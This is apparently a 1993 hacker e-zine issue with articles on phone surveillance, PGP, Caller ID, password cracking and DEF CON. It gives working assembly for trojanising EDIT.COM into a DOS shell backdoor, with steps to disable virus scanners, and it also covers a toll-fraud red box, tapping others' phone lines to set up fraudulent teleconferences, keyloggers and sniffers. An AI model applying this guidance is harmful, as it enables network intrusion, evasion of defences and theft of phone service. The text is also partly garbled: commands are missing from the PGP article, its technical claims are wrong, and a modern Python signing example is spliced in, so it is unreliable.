PANDEMONIUM MAGAZINE - ISSUE #1 - OCTOBER 31, 1993 - SPECTRE ENTERPRISES (tm)

______________________________________________________________________

        ---- WELCOME TO THE PREMIER ISSUE OF ----
        ---- PANDEMONIUM | AKA P11 -----

        AN INFORMATIONAL GUIDE FOR THE UNINFORMED

        Presented by Spectre Enterprises (tm)
        Covering diverse topics such as:
        Hack|ng(Coding), Ph0ne Stuff, and The Und3rgr0und
        FUCK it.. We have it all DAMMIT!..

______________________________________________________________________

Volume Number One, Issue Number One
Dated 10/31/93

Spectre World Headquarters BBS: The Aftermath
Sysop: Paradigm
14.4K V32.bis
2 Nodes (No HST at this time)
2 Gigs File Storage
RiSC Distribution
VLANET (programming)
H/P Discussion
(206)230-0424
(206)230-0490

____________________________________________________________________________
----------------------------------------------------------------------------

Table Of Contents
-------------------

[00] - PREFACE: A Word From The Editors - Paradigm & Dr. Bombay
[01] - PHONE PRIVACY: The Lack of - Paradigm
[02] - ENCRYPTION: History of.. w/ PGP info - Quantum
[03] - CALLER ID: Read if bored - Paradigm
[04] - THE QUARTER: The Better Alternative - Edword
[05] - FUTURE SECURITY: Access Denied - Rum Runner
[06] - CREATING BACKDOORS IN DOS DEBUG - Natex and Rum Runner
[07] - TRASHING: The art of garbage sifting - Edword
[08] - TELECONFERENCING WITH THE DOCTOR - Dr. Bombay
[09] - DEFCON ][: The BIG Event - The Dark Tangent
[10] - NEWS: Hungry Youths Apprehended - Anonymous

____________________________________________________________________________
----------------------------------------------------------------------------

What is Spectre Anyway?

Spectre is a new H/P group with one goal in mind. That goal is to bring the H/P world back on its feet. Our view is that it seems to have fallen, and can't get the fuck back up, or as the doctor says, 'it is becoming rather viscous' [viskus]. We will accomplish this (hopefully) by educating the masses in areas that Phrack and 26oo have negligently overlooked. While they are aimed at the experienced members of the underground, we will be establishing a structured foundation for the beginner/intermediate enthusiast.

Spectre's first goal is to produce a quality magazine which will help further our movement. It will be aimed at the beginner/intermediate hobbyist who wants to learn the basics or pick up a tip or two on a wide variety of topics. Likewise, we will cover topics that are usually looked upon as basic knowledge by the H/P community. Similarly, we will answer the questions that many are afraid to ask, fearing to look stupid and/or ignorant.

Unfortunately, there is no main theme in our first issue. We have found in case studies that organization has been linked to colon cancer, excessive perspiration, and impotence.

In summary, we hope to educate those who are willing to become the second generation of hackers. Likewise we hope the magazine will instill greater discussion in the areas we will present.
We finally decided to go through with this info-mag because nobody else was getting off their ass and producing something of worth. In conclusion, let's unite in the hope to restore the free flow of information in the underground.

Paradigm [Spectre]
Dr. Bombay [Spectre]

____________________________________________________________________________
----------------------------------------------------------------------------

The Current Member Listing as Of 10/29/93 10:23pm

  Paradigm     - Founder/Writer/Ideas/Editor
  Natex        - Founder/Writer
  Rum Runner   - Founder/Writer/Ideas
  Edword       - Writer/Ideas
  Dr. Bombay   - Writer/Editor
  Darion       - Internet Writer
  Quantum      - Writer
  The Kabal    - Writer/Coder
  Mental Floss - Musician (Next Issue)
  Binaur       - Coder (Next Issue)
  Shadowspawn  - VGA Artist (Next Issue)

If you want to be a Distribution Site or want to be a part of the Pandemonium team, whether it be as a Writer/Artist/Coder, or would like to write an article freelance, you can reach us at the following location:

  The AfterMath - Spectre/Pandemonium WHQ - [206]230-0424 - [206]230-0490

_______________________________________________________________________
-----------------------------------------------------------------------

              - [- Phone Privacy and How it Affects US -] -
                         Article By Paradigm

Never assume what you say over the phone to be private and/or confidential! In today's society the government has nothing better to do than watch our every move. They seem to find every possible way to infringe on our privacy. For instance, at least two different government agencies are known to use supercomputers to routinely monitor phone conversations transmitted via microwave. Virtually all long distance calls, as well as many local calls that originate out of a central office, are sent in this manner.
Each conversation is temporarily recorded and searched for trigger words, terms, and phrases. If any are found, the conversation is permanently recorded, along with the called/calling phone numbers, for later analysis. So what does this all mean? It means that you had better watch what you say, because Ma Bell is listening. Even those who are unaware of this infringement could be labeled as a possible threat due to the usage of a few misplaced words, and likewise would undergo yet further invasion. National security is important, but the definition of that security is becoming one that needs redefining.

There is yet another way in which the government, or anyone for that matter, can listen in on our conversations. All that is needed is an access code to a system known as REMOBS (REMote OBServation). Originally intended as a way for the telco to monitor your phone activity, it can be used by your fellow phreaker to listen in on your conversations. Basically it is a non-hardwire line tap that can be done from any touch tone phone. What is even worse is the fact that you are unaware of the tap, except in some instances where you will hear a clicking sound if the trespasser were to dial. Likewise, you may receive the clicks before the tap has been engaged if the REMOBS system being used is mechanical as opposed to digital. REMOBS is just another means of ensuring that what you say over the telephone cannot be considered private.

Hopefully, those of you that have actually read this far have now come to realize that your privacy is at stake. With the means I have just described, anyone with access to these two devices can intercept your communications. You should become more aware of what you say. The courts have already proven that you have no privacy when it comes to telecommunications. For these reasons many people have begun to seek encryption in order to secure the channels that used to be safe.
Paradigm [Spectre]

_______________________________________________________________________
-----------------------------------------------------------------------

                   - [- Encryption: How and Why? -] -
                          Article By Quantum

Encryption first got its start in the early 10th century. Caesar was the first to use encryption to send battle plans conceived by the emperor to his generals in the front lines. Caesar used a simple substitution method for encryption (ie. A would be R, B would be S). For its time, the method was strong, for by the time enemy forces could decipher it, the plans were already being executed. If Caesar had randomly chosen letters to substitute, having no patterns, then used the scheme only once, he would have made the one-time-pad used by governmental agencies today. Caesar's original method however, while strong for its time, would last literally a second in today's world.

This little history shows how you must upgrade security to keep information secure. Today, technology in microprocessors doubles every 18 months. That means information you encrypted 3 years ago is 4 times as likely to be compromised today.

Now on to a program that is considered contraband by the US government, PGP (Pretty Good Privacy). (It is considered illegal because of disputes on the patent of the algorithms used in PGP, notably RSA.) I like PGP because it is excellent software for keeping info secure. It is widely available, so that anyone wishing to communicate securely can pick up a copy of PGP and read their messages. I will be explaining how to use PGP, how to keep keys secure, and some of the other basics.

HOW TO USE PGP

PGP is a very easy program to use, and for more detailed information read the help files (pgp -h) or read the documentation.
The first thing you need to do is to create a public/private key pair so that you may send and receive messages. Do this with the command. (Exclude brackets from here on.) This stands for and will give you a public key and a private key. You will be asked to enter random keystrokes from which PGP will devise your keys. You will also be asked for a secret pass phrase (much like a password); this is for extra security. KEEP YOUR SECRET KEY OFF YOUR HD! KEEP IT ON A FLOPPY! This will keep anyone who gains control of your computer (physically or by remote) from getting your private key.

The public key you will want to distribute to all the local boards so that others may send you messages. You will also want to gather other people's public keys, because without their public key, you can't send them a message. (You will need to copy your public key off your public keyring with the command; its parts are your name, the ring, which will be the public key ring, and the base filename of the key to be extracted.) Then copy the .asc file to your upload directory and upload it as either a message (u/l ascii) or a regular file. [I prefer messages.]

To add a person's keyring that you d/l to your public ring, use the command: Again, keyname is the FULL filename, and ring will be pubring.

So now you want to send someone a secret message. Write it in any ascii compatible editor, then encrypt it with the recipient's public key using the command: Check that you have the recipient's id with the command. This encrypts a message that only the recipient can decode; not even you can decode the message you wrote (but why would you want to?). You can add further security to the message by `signing' it with your secret key (this in no way compromises security). Use -u.

You got an encrypted message, how do you decode it? Use the command:

pgp -d

If you want to be able to u/l your encrypted message as ascii, for transmission over a network, add the -a to the command line; this is ascii armor. (ie. would encrypt a message to Paradigm, sign it, and ascii armor it for u/l.)

Each key in your public keyring has a trust rating to it. This is the level of trust which you put on the key as to actually belonging to whom it says it does. If you want to edit the trust on one of your keys (your friend's BBS was hacked) use:

pgp -ke

You may then change the trust rating on the key. (PGP will alert you when you receive a message from that person to be careful of imposters.)

MORE ON ENCRYPTION SECURITY

When signing a message with your name, you prove the message is from you. (PGP automatically checks the signature with the public key.) By signing a message with your private key, you may think you are compromising your key. Not so; PGP uses the MD5 message digest for processing signatures. What this does is take the least significant 64 bits of your key (your key is 128-1024 bits in length), then the least significant 24 of the 64, and signs the message. Knowing the 24 lowest bits of a 1024 bit key may provide very little to an attacker wishing to brute force your key.

When you write a message that is sensitive, you still have the plaintext on your HD. You can delete this file, but like other files, it will come back when you undelete with Norton or PC Tools. The -w option will wipe the plaintext off your HD, then overwrite it. ( would encrypt a message to Paradigm, sign it, ascii armor it, then wipe the plaintext.) Now, even though you have wiped the file from your HD, sensitive hardware can still read the faint magnetic traces from your HD and acquire your plaintext. (FBI, SS both have this in their computer fraud divisions.)

Yet another way people may get the idea of your message is through traffic analysis. This is done by examining your phone bill to see where the message came from, where it was going, and at what time. This does not tell what is in your message, but can lead in the right direction.
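The signing step the article describes (hash the message, sign the digest with the secret key, check it with the public key), as an added example; this is not code from Pandemonium or from PGP. It assumes a constructed RSA key built from two small primes (real keys of the time were 512 to 1024 bits), uses MD5 only because the article names it, and invents a throwaway "toy armor" wrapper that is not PGP's ASCII armor.

```python
"""Hash-then-sign, in the shape the article describes for PGP signatures.

Added example: not code from Pandemonium or from PGP.  The key below is a
constructed toy (two small primes), MD5 is used only because the article
names it (it is broken for signatures today), and the armor format is
invented here.  What it shows: the signature is a function of the message
digest and the private exponent D, and verifying it needs only (E, N), so
handing out signed messages reveals nothing beyond the public key.
"""
import base64
import hashlib

# Constructed toy RSA key.  Both primes are chosen for the demo only; real
# PGP keys of the era were 512 to 1024 bits.  D is derived from them.
P, Q = 999_983, 1_000_003
N = P * Q                            # public modulus, just under 2^40
E = 65537                            # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))    # private exponent (needs Python 3.8+)

ARMOR_BEGIN = "-----BEGIN TOY SIGNATURE-----"
ARMOR_END = "-----END TOY SIGNATURE-----"


def digest_int(message: bytes) -> int:
    """MD5 of the message as an integer below N.

    A real key is wider than the 128-bit digest, so the (padded) digest fits
    directly; our toy modulus is ~40 bits, so the digest is reduced mod N.
    """
    return int.from_bytes(hashlib.md5(message).digest(), "big") % N


def sign(message: bytes) -> int:
    """Signature = digest^D mod N.  Only the holder of D can compute this."""
    return pow(digest_int(message), D, N)


def verify(message: bytes, signature: int) -> bool:
    """True iff signature^E mod N equals the message digest.

    Uses only the public key (E, N): the verifier never sees D.
    """
    if not 0 < signature < N:
        return False
    return pow(signature, E, N) == digest_int(message)


def armor(signature: int) -> str:
    """Wrap the signature bytes in base64 between marker lines so it can be
    posted as a plain text BBS message (toy format, not PGP's)."""
    raw = signature.to_bytes((N.bit_length() + 7) // 8, "big")
    body = base64.b64encode(raw).decode("ascii")
    return f"{ARMOR_BEGIN}\n{body}\n{ARMOR_END}\n"


def dearmor(text: str) -> int:
    """Inverse of armor(); raises ValueError if the markers are missing."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if len(lines) != 3 or lines[0] != ARMOR_BEGIN or lines[2] != ARMOR_END:
        raise ValueError("not a toy-armored signature")
    return int.from_bytes(base64.b64decode(lines[1]), "big")


def demo() -> dict:
    """Sign a constructed message and show what verification accepts."""
    msg = b"Paradigm: meet at 2100, bring the Q.BMP printout"  # constructed
    sig = sign(msg)
    return {
        # the genuine message, signature round-tripped through armor
        "genuine": verify(msg, dearmor(armor(sig))),
        # one character of the message changed after signing
        "altered_message": verify(msg.replace(b"2100", b"2130"), sig),
        # a signature nobody computed with D
        "forged_signature": verify(msg, (sig + 1) % N),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:17s} verifies: {ok}")
```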
I hope I didn't lose anyone in this article; it is a very complex subject and this just scratches the surface. Any feedback or questions are appreciated.

>>> My next article will be on how to break and decipher the meaning of any messages you may come across, both through cryptanalysis, brute force attacks, and algorithmic weaknesses including factoring and prime number digests. <<<

Quantum [Spectre]

_______________________________________________________________________
-----------------------------------------------------------------------

                  - [- General Info On Caller ID -] -
                         Article By Paradigm

Over the years, the telcos have been installing new signalling equipment that can instantaneously pass on the caller's phone number to the receiver of the call. This has become a reality in many areas all over the U.S. On August 3rd, 1993, Washington became the latest victim. However, those who are not customers of US West will not have this service available as of yet. Even though the service has been widely publicized and discussed on the major boards, there still tends to be confusion amidst the general public on what it is all about. This short article will cover some information on the new service "Caller ID".

Those who have the service available to them are given several options. One such option is to pay for a caller id box which sits next to your phone and will display the number of the caller before the phone even rings. This is nice for when you don't want to talk to that guy/girl that won't get the hint. What I don't get is the fact that any knob could hit *67 to block the line so his/her number isn't displayed when calling you. Line blocking (hit *67 before the call is made) will not block 911 or Call Trace (*57).
Call tracing was made available for those who get harassing/obscene phone calls and wish to catch the perpetrator. The victim of the call would hang up and hit *57, then he/she would get a recording telling whether or not the call had been successfully traced. Likewise you will be hit with that $1.50 charge per trace. I have heard several rumors of how many times it takes to trace someone before you can take action, but it all depends on the situation. Under normal circumstances it will take 3 traces to take deterrent action. If the person feels that the call is life threatening, then by all means he/she can contact the local police force and can use the trace to aid them. One other thing I failed to mention was the fact that you cannot line block (*67) a Call Trace (*57), for obvious reasons.

Little known to most, Caller ID (ICLID) has been around for a long time, but has been better known as ANI (Automatic Number Identification). Caller ID is simply one of the many forms of ANI and is part of Ma's plan to screw us over. Caller ID has been around for quite some time in areas you might not have realised. Most larger companies have it for all incoming calls, which in turn will bring up the caller's customer report. Likewise, we are all familiar with Enhanced 911 and its abilities. For more information on 911 I highly suggest checking out Phrack, which covered the documents in one of its issues (I am braindead right now.. and can't remember which one).

ANI has been a major cause for the drop of the inexperienced phreaker and/or hacker. Unless they take appropriate measures they can get caught scanning for carriers and/or tones (some states don't allow scanning of any sort) and hacking the systems found. Many are afraid of getting caught and prosecuted for their actions, and personally I don't blame them. Unfortunately, this is one of the reasons the H/P scene seems to be slowing in the area that at one time flourished.
Hence, new ideas and concepts have begun to pop up everywhere. Now, with the advent of cellular technology, people are finding new ways to accomplish things. Even payphones seem to be picking up in usage by your fellow hacker due to the fact that they are safer if not abused.

Paradigm [Spectre]

_______________________________________________________________________
-----------------------------------------------------------------------

           -[- The Quarter: Building a Red Box First Hand -]-
                          Article By Edword

The Quarter

While I was flipping through a recent issue of 2600 I noticed the schematic for the Quarter. A close examination of the schematic showed one error which is fixed with the accompanying picture [Q.BMP]. The hardest part of building this box is that you need a 600 Ohm speaker. If you run into trouble finding one call Mouser at 800-23MOUSER; it should run you about $5, and while you are at it order a 6.5 MHz crystal. Building the box is easy, just be cautious of heating up the ICs because they are a little sensitive to heat. Be careful and take your time as you are in no rush, and rushing it only makes for a sloppy job.

The circuit uses a TCM 5089 DTMF encoder controlled by a 6.5 MHz crystal to make the musical tones. The 555 timer is used with the decade counter to give the correct timing and count out 5 tones. I was in a hurry and bought all the parts around town which cost me quite a bit more than it should have (I think I paid $20), so look for a good deal and maximize your savings; after all, whoever said a toll fraud device should cost a lot of money? The Quarter is a nifty improvement over the $25 dialer which is not being produced anymore from what I hear. Not to mention that you have to get a crystal which can cost a lot and is hard to fit in the tiny box.
This also requires a crystal but is much cheaper to build. I would also like to remind you that all of the credit for this device goes out to 2600 for printing this up; this is only a copy with some additions by me. Enough talk, let's get down to the parts list.

Resistors:   Values:      Notes:
  R1         220k Ohm     The exact values of R1 and R2 are not
  R2         220k Ohm     important so long as their sum is 440.
  R3         1k Ohm

Capacitor:   Values:
  C1         0.1 uF

Crystal:     Values:      Notes:
  X1         6.5 MHz      6.5536 will also work

Chips:       Name:        Notes:
  U1         TCM5089      DTMF encoder
  U2         74HC4017     Decade counter. Regular 4017 is okay.
  U3         CMOS 555     Timer IC. Regular 555 is okay if a 1 kOhm
                          resistor is inserted between pins 3 and 8

Speaker:     Impedance:   Notes:
  SPKR       600 Ohm      U1 expects an equivalent load.

Switch:      Type:        Notes:
  S1         Momentary    You may also add a power switch.

[NOTE] As printed the circuit works on 3 AAA batteries for a total of 4.5 Volts. A 9 volt battery may also be used but R1 and R2 should then total 470K Ohms.

Edword [Spectre]

_______________________________________________________________________
-----------------------------------------------------------------------

             - [- Future Security: Ways to Work Around -] -
                        Article By Rum Runner

The old ways of hacking into a system, mainframe or network are quickly dying out. Most people no longer use their first name as a password. It was nice when things were so simple. Now the educational hacker needs to be much more creative.

In some UNIX systems, the password files are shadowed. A shadowed password file is one that has a star '*' or other character in the place of the encrypted password. If you are fortunate enough to have the password file, or have a system that does not have a shadowed password file, then the following will not be as much of an urgency for you.
If you have a system's /etc/passwd file you can run a cracker on it, such as Crackerjack, to try to get accounts on that system. Password file crackers work on the fact that the encryption is not easily breakable, but if you encrypt that same word with the same salt the results will compare, and you will have that account's password. Such programs work on passwords that are found in standard dictionary files; however, it would be hard to get every single password if they were all random letters and numbers.

These methods of cracking with a dictionary file using something like Crackerjack are getting old fast, mainly because users don't and can't just use words; they need to change the capitalization, or add numbers or other characters. Most crackers read from a dictionary, and usually only try the words and variations that you give it. So if someone used a password "account1", most crackers wouldn't find it; same goes for "#1acct". This can become tedious very fast, and all but the most aggressive hackers drop out. Some people have suggested that we create a look up table of all possibilities for the encryption, or crack a password by brute force, all possible permutations. Not quite: the possibilities for permutations is a 72 digit number. Not something to do in an afternoon's work.

The future looking hacker knows that systems are getting tighter, and will continue to find new ways around the barriers. Some of the ways around this are by line tapping, keystroke recorders, and network watchers (snoopers).

There are several different ways to tap a line, such as hard wire splice and electronic induction. Both ways allow the educational hacker to listen in on what is going through the line; just be sure that your modem is listening at the right speed (baud), otherwise all you'll get is a screen full of trash. However, I wouldn't do speeds above 2400 baud. If you're quick, you can catch where the person is dialing (listen to DTMF tones), and get their log on with password.
They will even show you how to get around if you're not familiar with the system. (Not sure if this is what they meant when they said on-line training is the wave of the future.)

Second is to use a keystroke recorder (TSR). There are some available on some of the educational boards. Usually what they do is record all of a user's keystrokes into a hidden file somewhere on the hard drive. The only down side to this is that you need access to that machine before and after that person logs on, or does their work. This isn't a problem if you were to install the keystroke recorder in a computer lab at work or in a school. Set it up in the morning, and come back the next morning.

The third method is to use a network watcher (snooper). These are a little more difficult to make, and to come by. Though, if you have one, you can watch what everyone is doing on a network. Since with Token Ring and bus networks all information passes through all users, there is no reason why you can't take a look at it before it passes by.

Rum Runner [Spectre]

_______________________________________________________________________
-----------------------------------------------------------------------

          - [- Programming Backdoors in DOS using MS Debug -] -
                    Article/Programming by Natex
                      Programming by Rum Runner

Many of us at one time or another have wanted to have access to the operating system of some terminal, local area network, etc. Many of these networks and computers are easy to get into, but others have more security. When such networks are first started, access to the operating system is easy.
Usually it involves either pressing CTRL-C during the execution of the AUTOEXEC.BAT file or stealing a copy of one of the network boot disks and rewriting the AUTOEXEC.BAT file so that it puts you directly into the operating system. When security tightens, however, you may find it difficult to access the operating system. That is what BACKDOORS are for.

It is relatively simple to modify an existing program or utility to suit your needs. One of the first programs that we modified to do this was EDIT.COM. Many networks support the use of a text editor. Several of our ideas were to make a special command line parameter or to shell to COMMAND.COM when the program ran out of memory. The one that we finally went with was to put one of those "Press any key to continue" messages when the user exited. If the key they hit was, say, "A", it would run the file COMMAND.COM. If any other key was pressed, it would return the user to the network. If any of the network users were familiar with MS-DOS edit, they would likely think that it was the network asking for the keypress instead of the program.

To modify the file we used a nice little utility that everyone with MS-DOS has: DEBUG. Debug works great and is relatively easy to use. To start editing EDIT, simply go into the DOS directory and type the following (it is a great idea to make a back-up copy of edit.com first!!):

DEBUG EDIT.COM

This will put you in the DEBUG program with EDIT.COM as your current file. The first thing you will need to do is take a look at your registers. To do this type R and press return. You should see something like this:

C:\DOS>DEBUG EDIT.COM
-r                                                    <---- user input of 'r'
AX=0000  BX=0000  CX=019D  DX=0000  SP=FFFE  BP=0000  SI=0000  DI=0000
DS=1672  ES=1672  SS=1672  CS=1672  IP=0100   NV UP EI PL NZ NA PO NC
XXXX:0100 BB6404        MOV     BX,0464

All of the numbers seen are in hexadecimal, or base 16. The one that we need to look at now is the register CX. Register CX is the current file size. For our purposes we will need to change this size to about 300 temporarily. To accomplish this task enter the following:

r cx 0300

This will change the file size to 768 bytes (remember that all of the registers are in hexadecimal). Now the thing to look for in a program is the actual end of the program where it exits. This can be several things. If you are making a backdoor in a really old DOS program the end of the program might be:

INT 20

INT 20 stands for interrupt 20, which was used to terminate programs in old DOS versions. Now most programs have:

MOV AH,4C
INT 21

which is interrupt 21 function 4C. To search for this in a program you need to use the unassemble command. Do this by pressing U at the prompt. What you will see are a bunch of assembler commands. In EDIT.COM the end of the program is at location XXXX:01C9. At this spot you will see something similar to this:

XXXX:01C9 B44D     MOV AH,4D   <-- Get child process return code
XXXX:01CB CD21     INT 21      <-- Run the above function
XXXX:01CD B44C     MOV AH,4C   <-- Terminate with return code
XXXX:01CF CD21     INT 21      <-- Run the above function

All that you need to do is change line 01C9 to jump to the location of your "Press any key to continue" routine. You do this by typing:

a 01C9
JMP 029E
                   <-- Press the enter key here

A good place to put this routine is at location XXXX:029E. This is because the end of the file was previously set to location XXXX:029D (Register CX + 100 + 1, because the beginning of the file starts at line 100). To add in the routine enter the following:

a 029E
MOV AH,09
MOV DX,02C0
INT 21
MOV AH,08
INT 21
CMP AL,61
JZ 02AF
INT 20
MOV AH,4B
MOV DX,02D0
MOV BX,0286
MOV AL,00
INT 21
INT 20
                   <--- Make sure you press enter here
e 02C0 "Press any key$"
e 02D0 "COMMAND.COM" 00
r cx 01DC
w
q

HOW IT WORKS:

The a 029E command tells debug that you want to start entering assembler code. The three commands that follow tell the computer that you want to print a text string at 02C0 to the monitor. The next two lines wait for a keypress. When the user presses a key it compares the key that they pressed to 61 (61 is the hexadecimal value for a lowercase "a"; if you want to change this to another key, look up the ascii table in your DOS book to find out the hex values for other keys). If the key pressed was "a" it jumps to location 02AF and executes the code there. If it was another key, it exits. At location 02AF the file specified in 02D0 is run. In this case it is COMMAND.COM (the two zeros at the end of COMMAND.COM tell it that the file name is ended, just like how there is a dollar sign after the "press a key" text to tell the program that the text is done). After it is done running the program (after you type EXIT in the DOS shell) it exits back to whatever it was run from (the network in this case). The "r cx" command, like earlier, specifies the file size in hexadecimal. Here it is changed to the exact size of the new file (476 bytes). The "w" command writes the file to disk and the "q" command quits DEBUG.

VIRUS SCANNERS:

Some virus scanners may detect the change in the file size. To disable these, you should do the "MEM /C /P" command from the DOS prompt. This will tell you what TSRs (terminate and stay resident programs) are in memory. If any look like virus checkers, disable them by taking them out of the AUTOEXEC.BAT file. If the people running the network are using the MS-DOS 6.0 virus scanner, you should delete the file called CHKLIST.MS from the DOS and root directory.

CONCLUSION:

This program will work in nearly all network situations. The only problem is that you have to get it into the network first. You can accomplish this by the methods mentioned in the first part of this article. This program is mainly to ENSURE that you will always have access to the network you are using. It is important that the file is in the DOS directory and that COMMAND.COM is also in the DOS directory. (Don't know why it wouldn't be.)
If you know assembler you can continue making backdoors in other programs. Another idea that we have had is to make a virus that appends to the end of EDIT.COM and changes line 01C9 to JMP 029E. This could spread all over the entire network so that you would have access to DOS on any of the terminals. It would not likely spread out of the network unless someone had EDIT.COM on their disk and decided to take it home. Wouldn't that one be interesting.

Have fun making backdoors. Until next time...

Natex [Spectre]
Rum Runner [Spectre]

_______________________________________________________________________
-----------------------------------------------------------------------

                  - [- Beginners Guide to Trashing -] -
                          Article By Edword

Trashing, dumpster diving, can hopping: they're all the same thing. While the goals are to get the great treasures companies throw out, notebooks, printouts, carbons, manuals, and countless other items of value can be found. While there are many different ways of going about this, few are as safe and as rewarding.

You will need at least two people, and a car does not hurt either. Get on your worst clothes: army coats, ripped shirts, jeans with holes in them and other such normal homeless person apparel. Get a few trash bags in your pockets and wait until it's about 1am. Find your dumpster, hopefully behind a building such as a Bell office, cellular phone center etc. Jump in, whip out the trash bags and load them up; hopefully you have a car and someone will pick you up in five minutes. Don't really try to sort everything you see but go for the notebooks, computer print outs and other items of interest, pushing away the boards, empty boxes, golf clubs etc...
Throw the stuff in the car and drive somewhere that there are not a lot of people and sort your findings; go to the edges of parks where there are those garbage cans and get rid of the unwanted stuff [remember to recycle paper]. Go home and read everything again, making a note of what you found. Even if the stuff you find is not worth anything to you, check with the locals and trade for other useful information.

If security comes over to you just leave the area; since they are not the police, they really cannot do much to you. However, since you are dressed in homeless apparel just act drunk, stagger away, and they will probably just tell you not to come back. If the police come, do not act drunk because they can arrest you. Instead, tell them you were just looking for food and they will probably tell you how to get to a homeless shelter. If you are lucky they might give you a ride over there (hey, free room and board for the night, or at least until the cops leave). There really isn't much they can do to you, but I would avoid dumpster diving in the back of department stores such as Nordstroms and The Bon. They often have cameras pointed at their dumpsters for security reasons.

Edword [Spectre]

_______________________________________________________________________
-----------------------------------------------------------------------

[- Teleconferencing With The Doctor -]
Article By Dr. Bombay

So you're tired of everybody at school pointing and laughing at you all the time. You feel it's time to make a change in your life, time for you to be in with the 'in' crowd. Yes, it's time to become k-k00l. Right now you're probably thinking, "Well sure Dr. Bombay, I want to be k-k00l, but all my attempts in the past have failed miserably."
Take heart young hacker, with just a few simple tools and a vague plan, you can set up a teleconference. Once word gets out around school, you'll have lots of friends, be at all the parties, and you can even steal milk money from the little geeks that used to be your only friends.

Things you'll need:
- a phone
- two alligator clips
- a wire stripper
- a phone line (preferably not your own)

What to do:

Okay, first you'll need to modify your little phone ever so slightly. Cut off the very end of the phone line (the part right before the bit that plugs into the wall), and strip the outer insulation with your handy dandy wire stripper or mommy's good scissors; they work equally well. Now you should see four wires; cut off the yellow and green wires, you won't need them [Note: some phones only have two wires; if this is the case, skip the cutting bit just mentioned]. Now grab your wire strippers (once again, mommy's scissors are an option) and strip the ends off of the red and green wires. Now attach an alligator clip to each of your now exposed wires (with whatever method you prefer; soldering is the best, but tape will do in a fix).

At this point, a car comes in handy. You'll need to find a phone line to abuse.. er, I mean use. What you should look for is either a small grey box on the side of a house (not recommended) or a metal case on the side of a building (usually office or apartment). They can vary widely in size, but I've found they're usually around 2 feet high and maybe 6 inches to a foot wide. To open most of them you will need to pull the bottom of the cover towards you, then slide the entire cover downwards, and the cover will now swing about the hinge on the bottom; just swing the top of the cover open now (or, if this doesn't work, just fuck with it awhile). You should see a variety of threaded posts sticking out from the unit (maybe 3/4 of an inch long); they will be set up in pairs at a diagonal (see el cheapo drawing below).
Attach an alligator clip to each of the pair and then take the phone off hook and listen for a dialtone; if there isn't one, try another pair. Once you have a dialtone, the next step is to find out the number you're calling from.

[El Cheapo Drawing: a grid of threaded posts ("+"), with posts a and c in the top row and post b in the row below; try either a and b, or b and c..]

Get an ANI number from yer local elite bbs.. (one that seems to have a pretty good life expectancy is 1.800.852.9932). Dial this number, write down where you're calling from, and now you just need to make up a little info. Write down a name, address (not yours..) and the number you just got on a slip of paper, and you're ready to set up your conference.

You can use whatever company you like (I prefer AT&T at 1.800.232.1111). Call them up and let them know that you would like to set up a teleconference. Then, request an 800 dialin if you would like a conference where the participants call an 800 number and enter a 6 digit pin number (very good). They also offer an 0-700 dialin where the participants dial an 0-700 number and enter a pin (also nice), or there's the traditional dialout conference where you as the host have to call all of your participants for them to get in. For a dialout conference through AT&T, dial 0.700.456.1000 (these have the benefit of you being able to be more choosy; with an 800 dialin sometimes idiots get your pin number and sit there for awhile hitting touch tones).

Something I've learned from experience is that you can set a conference up at 2a.m., as long as it's to begin in the evening, or a morning after that day (i.e. don't say "uh.. yeah, i want a conference with 16 ports to begin in 3 minutes and last for 2 weeks..."). Try not to get greedy when setting one up.. just ask for 16 ports (lines) and maybe 10 or 12 hours; you can have them add more ports after the conference starts. I know that at least 800 dial-ins are auto-extending, so you'll usually get at LEAST 4 more hours than you ask for.
Whichever variety you choose, do NOT call the host number, or use the host pin from your house; only join as a participant. If you need to get on as host, use a diverter, or a payphone. Although calling from your home with a participant pin is pretty safe, I still call through an operator (dial 0 and tell the operator you'd like to make an operator assisted call to 1-800-what-ever; it's even free) as that seems to defeat the simple ANI 800 numbers have.

I ask you only to do one favor for me. As you set up conferences and become as cool as fuck, don't start writing in l@y/\/\3 l3++3/>s all the time, or RAnDom CaPITalS and shit. I'm not sure why, but that always annoys me.

Hack hard, hack long, hack 2 live.

_______________________________________________________________________
-----------------------------------------------------------------------

[- Pre-Announcement of DEFCON II -]
Typed up by The Dark Tangent

DEF CON ][ Initial Announcement

WTF is this?
This is the initial announcement and invitation to DEF CON ][, a convention for the "underground" elements of the computer culture. We try to target the (fill in your favorite word here): Hackers, Phreaks, Hammies, Virii coders, programmers, crackers, Cyberpunk Wannabees, Civil Liberties Groups, CypherPunks, Futurists, etc..

WHO: You know who you are, you shady characters.
WHAT: A convention for you to meet, party, and listen to some speeches that you would normally never hear.
WHEN: July 22, 23, 24 - 1994
WHERE: Las Vegas, Nevada @ The Sahara Hotel

So you heard about DEF CON I, and want to hit part ][? You heard about the parties, the info discussed, the bizarre atmosphere of Las Vegas and want to check it out in person? Load up your laptop muffy, we're heading to Vegas!

Here is what three out of three people said about last year's convention:

"DEF CON I, last week in Las Vegas, was both the strangest and the best computer event I have attended in years."
-- Robert X. Cringely, Info World

"Toto, I don't think we're at COMDEX anymore."
-- Coderipper, Gray Areas

"Soon we were at the hotel going through the spoils: fax sheets, catalogs, bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds. The documents disappeared in seconds."
-- Gillian Newson, New Media Magazine

DESCRIPTION:

Last year we held DEF CON I, which went over great, and this year we are planning on being bigger and better. We have expanded the number of speakers to include midnight tech talks and additional speaking on Sunday. We attempt to bring the underground into contact with "legitimate" speakers. Sure it's great to meet and party with fellow hackers, but besides that we try to provide information and speakers in a forum that can't be found at other conferences.

WHAT'S NEW THIS YEAR:

This year will be much larger and more organized than last year. We have a much larger meeting area, and have better name recognition.
Because of this we will have more speakers on broader topics. We plan on having a SLIP connection with multiple terminals and an IRC connection provided by cyberspace.com. We are trying to arrange a VR demo of some sort. Dr. Ludwig will present this year's virus creation award. There will be door prizes, and as usual a bigger and better "Spot The Fed" contest. We'll try to get an interesting video or two for people to watch. If you have any cool footage you want shown, email me with more information.

WHO IS SPEAKING:

